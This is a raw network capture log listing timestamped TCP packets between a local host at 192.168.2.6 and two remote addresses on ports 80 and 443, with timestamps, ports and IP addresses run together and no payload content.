                                                                                                                                                                              Nov 21, 2024 08:30:34.458118916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.458154917 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.458168983 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.458194017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.458244085 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.556777954 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.557723999 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.557754993 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.558162928 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.558177948 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.577958107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.578175068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.578258991 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.622740030 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.623285055 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.623320103 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.623737097 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.623744011 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.646104097 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.646671057 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.646703005 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.646997929 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.647005081 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.659529924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.659629107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.659710884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.663681030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.663779974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.663846016 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.672198057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.672378063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.672461987 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.680493116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.680602074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.680675983 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.688898087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.689028025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.689096928 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.697292089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.697431087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.697510958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.705705881 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.705852985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.705919981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.714127064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.714231968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.714297056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.722520113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.722628117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.722688913 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.730923891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.731059074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.731128931 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.739388943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.739439964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.739507914 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.860780001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.860802889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.861004114 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.862207890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.862246990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.862293005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.867377043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.867492914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.867539883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.872546911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.872648954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.872709036 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.877625942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.877783060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.877830982 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.882776976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.882864952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.882924080 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.887924910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.888008118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.888062000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.893053055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.893186092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.893238068 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.898175001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.898228884 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.898278952 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.903342962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.903456926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.903506041 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.908472061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.908586979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.908632994 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.913597107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.913693905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.913739920 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.918766975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.918883085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.918932915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.923858881 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.923996925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.924040079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.929001093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.929109097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.929158926 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.934166908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.934400082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.934453011 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.003601074 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.003669024 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.003710985 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.003964901 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.003982067 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.004004002 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.004010916 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.006571054 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.006613970 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.006685019 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.006814003 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.006829023 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.046641111 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.047028065 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.047041893 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.047454119 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.047458887 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.062346935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.062505007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.062563896 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.064414978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.064528942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.064580917 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.068851948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.068964958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.069030046 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.072890043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.072989941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.073040009 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.075674057 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.075855017 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.075917959 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.075958967 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.075958967 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.075973988 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.075984001 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.077124119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.077186108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.077229023 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.078290939 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.078340054 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.078403950 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.078516006 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.078533888 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.081444979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.081578016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.081628084 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.085663080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.085769892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.085819960 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.089812040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.089833021 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.089850903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.089894056 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.089903116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.089934111 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.090042114 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.090051889 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.090063095 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.090066910 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.092211008 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.092251062 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.092320919 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.092447996 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.092461109 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.094054937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.094197989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.094249010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.098345041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.098483086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.098541021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.102673054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.102705002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.102751017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.106728077 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.106813908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.106857061 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.110908985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.111027956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.111068010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.115139008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.115245104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.115283012 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.119368076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.119493961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.119534969 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.123574018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.123645067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.123682976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.127796888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.127904892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.127943993 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.132096052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.132147074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.132184029 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.136379957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.136477947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.136518955 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.140568018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.140688896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.140727997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.144728899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.144841909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.144881010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.149014950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.149142981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.149183989 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.153214931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.153301001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.153338909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.157536030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.157655954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.157694101 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.161663055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.161742926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.161782980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.263923883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.264039040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.264092922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.265641928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.266325951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.266367912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.266443014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.270920992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.270967960 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.271945953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.273387909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.273430109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.273545027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.276572943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.276619911 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.276695013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.279378891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.279499054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.279525995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.282649040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.282696962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.282743931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.285872936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.285917997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.286026955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.289031982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.289076090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.289141893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.294104099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.294147015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.294210911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.295629025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.295670986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.295743942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.298894882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.298913002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.298943996 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.301753044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.301796913 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.301930904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.305039883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.305058002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.305119038 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.307928085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.307982922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.308080912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.311197042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.311229944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.311249018 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.313971043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.314022064 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.314157963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.317204952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.317261934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.317346096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.320346117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.320405006 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.320456982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.323441982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.323491096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.323616028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.326535940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.326553106 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.326577902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.329659939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.329675913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.329701900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.334173918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.334191084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.334220886 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.335853100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.335900068 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.335989952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.338798046 CET8049762185.215.113.16192.168.2.6
